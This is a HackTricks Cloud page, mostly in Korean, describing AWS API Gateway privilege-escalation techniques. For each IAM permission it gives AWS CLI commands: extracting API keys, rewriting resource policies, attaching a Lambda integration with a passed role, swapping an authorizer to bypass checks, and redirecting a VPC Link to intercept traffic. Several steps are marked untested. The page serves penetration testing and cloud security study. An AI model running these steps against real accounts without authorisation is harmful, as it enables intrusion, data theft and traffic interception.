AWS - Apigateway Privesc

Reading time: 4 minutes

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

구독 계획 확인하기!
**💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.

Apigateway

자세한 정보는 다음을 확인하세요:

AWS - API Gateway Enum

`apigateway:POST`

이 권한이 있으면 구성된 APIs에 대한 API keys를 생성할 수 있습니다(리전별).

bash

aws --region <region> apigateway create-api-key

Potential Impact: 이 기술로는 privesc를 할 수 없지만 민감한 정보에 접근할 수 있습니다.

`apigateway:GET`

이 권한이 있으면 구성된 API(리전별)의 생성된 API keys를 얻을 수 있습니다.

bash

aws --region <region> apigateway get-api-keys
aws --region <region> apigateway get-api-key --api-key <key> --include-value

Potential Impact: 이 기법으로는 privesc를 할 수 없지만 민감한 정보에 접근할 수 있습니다.

`apigateway:UpdateRestApiPolicy`, `apigateway:PATCH`

이 권한들로 API의 리소스 정책을 수정해 자신이 해당 API를 호출할 수 있도록 권한을 부여할 수 있으며, API gateway가 가진 잠재적 권한을 악용할 수 있습니다(예: 취약한 lambda를 호출하는 경우).

bash

aws apigateway update-rest-api \
--rest-api-id api-id \
--patch-operations op=replace,path=/policy,value='"{\"jsonEscapedPolicyDocument\"}"'

Potential Impact: 일반적으로 이 기법으로 직접 privesc를 달성할 수는 없지만 민감한 정보에 접근할 수 있습니다.

`apigateway:PutIntegration`, `apigateway:CreateDeployment`, `iam:PassRole`

note

테스트 필요

해당 권한 apigateway:PutIntegration, apigateway:CreateDeployment, 및 iam:PassRole을(를) 가진 공격자는 IAM role이 연결된 Lambda 함수를 대상으로 기존 API Gateway REST API에 새로운 integration을 추가할 수 있습니다. 그런 다음 공격자는 해당 Lambda 함수를 트리거하여 임의의 코드를 실행시키고 IAM role에 연관된 리소스에 접근할 수 있습니다.

bash

API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
HTTP_METHOD="GET"
LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"
LAMBDA_ROLE_ARN="arn:aws:iam::account-id:role/lambda-role"

# Add a new integration to the API Gateway REST API
aws apigateway put-integration --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --type AWS_PROXY --integration-http-method POST --uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations --credentials $LAMBDA_ROLE_ARN

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

잠재적 영향: Lambda function의 IAM role과 연관된 리소스에 대한 액세스.

`apigateway:UpdateAuthorizer`, `apigateway:CreateDeployment`

note

테스트 필요

apigateway:UpdateAuthorizer 및 apigateway:CreateDeployment 권한을 가진 공격자는 기존 API Gateway authorizer를 수정하여 보안 검사를 우회하거나 API 요청이 이루어질 때 임의의 코드를 실행할 수 있습니다.

bash

API_ID="your-api-id"
AUTHORIZER_ID="your-authorizer-id"
LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"

# Update the API Gateway authorizer
aws apigateway update-authorizer --rest-api-id $API_ID --authorizer-id $AUTHORIZER_ID --authorizer-uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potential Impact: 보안 검사 우회, API 리소스에 대한 무단 액세스.

`apigateway:UpdateVpcLink`

note

테스트 필요

권한 apigateway:UpdateVpcLink를 가진 공격자는 기존 VPC Link를 다른 Network Load Balancer로 가리키도록 수정하여, private API 트래픽을 무단 또는 악의적인 리소스로 리디렉션할 수 있습니다.

bash

VPC_LINK_ID="your-vpc-link-id"
NEW_NLB_ARN="arn:aws:elasticloadbalancing:region:account-id:loadbalancer/net/new-load-balancer-name/50dc6c495c0c9188"

# Update the VPC Link
aws apigateway update-vpc-link --vpc-link-id $VPC_LINK_ID --patch-operations op=replace,path=/targetArns,value="[$NEW_NLB_ARN]"

잠재적 영향: 비인가된 비공개 API 리소스 접근, API 트래픽의 가로채기 또는 중단.

tip

HackTricks 지원하기

구독 계획 확인하기!
**💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.

HackTricks Cloud